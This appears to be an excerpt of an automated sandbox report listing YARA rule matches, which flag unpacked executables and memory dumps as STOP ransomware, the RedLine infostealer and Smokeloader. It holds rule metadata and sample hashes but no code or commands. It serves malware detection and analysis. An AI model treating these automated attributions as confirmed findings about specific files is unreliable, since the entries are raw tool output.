Source: 25.0.5999.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 12.2.37F1.exe.5f55530.7.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 12.2.37F1.exe.5f56418.8.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 12.2.37F1.exe.4a8a18e.3.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 12.2.37F1.exe.5f56418.8.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 12.3.37F1.exe.2eb9e80.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 25.0.5999.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 25.0.5999.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 25.0.5999.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 12.2.37F1.exe.48d0e67.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 12.2.37F1.exe.5f8cf50.6.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 12.3.37F1.exe.4910000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 19.2.5999.exe.23715a0.1.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 19.2.5999.exe.23715a0.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 19.2.5999.exe.23715a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 25.0.5999.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 25.0.5999.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 25.0.5999.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 25.0.5999.exe.400000.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 12.3.37F1.exe.2eb9e80.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 25.0.5999.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 25.0.5999.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 25.0.5999.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 12.2.37F1.exe.5f8cf50.6.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 12.2.37F1.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 25.0.5999.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 25.0.5999.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 25.0.5999.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 12.2.37F1.exe.4b70000.5.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 12.2.37F1.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 12.2.37F1.exe.4b70ee8.4.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 19.2.5999.exe.23715a0.1.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 19.2.5999.exe.23715a0.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 19.2.5999.exe.23715a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 25.0.5999.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 25.0.5999.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 25.0.5999.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 25.0.5999.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 25.0.5999.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 25.0.5999.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 12.2.37F1.exe.5f55530.7.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 12.2.37F1.exe.4a8a18e.3.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 12.2.37F1.exe.4b70000.5.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 12.2.37F1.exe.4a8b076.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 25.2.5999.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 25.2.5999.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 25.2.5999.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 25.0.5999.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 25.0.5999.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 25.0.5999.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 25.0.5999.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 25.0.5999.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 25.0.5999.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 25.0.5999.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 25.0.5999.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 25.0.5999.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 25.0.5999.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 25.0.5999.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 25.0.5999.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 25.0.5999.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 25.0.5999.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 25.0.5999.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 25.2.5999.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 25.2.5999.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 25.2.5999.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000001E.00000000.510855251.00000000008D8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.356712809.0000000000710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000001E.00000002.539352220.00000000008D8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000000F.00000000.426588359.00000000007D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000000E.00000000.432265249.0000000000700000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000000B.00000002.505257421.00000000007A8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000013.00000002.473163211.00000000022D7000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.357053208.00000000008D8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000012.00000002.512998427.0000000000968000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000001E.00000000.507812417.0000000000700000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000000C.00000003.417269957.0000000004910000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0000000F.00000000.430084061.00000000007D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.356833950.0000000000841000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
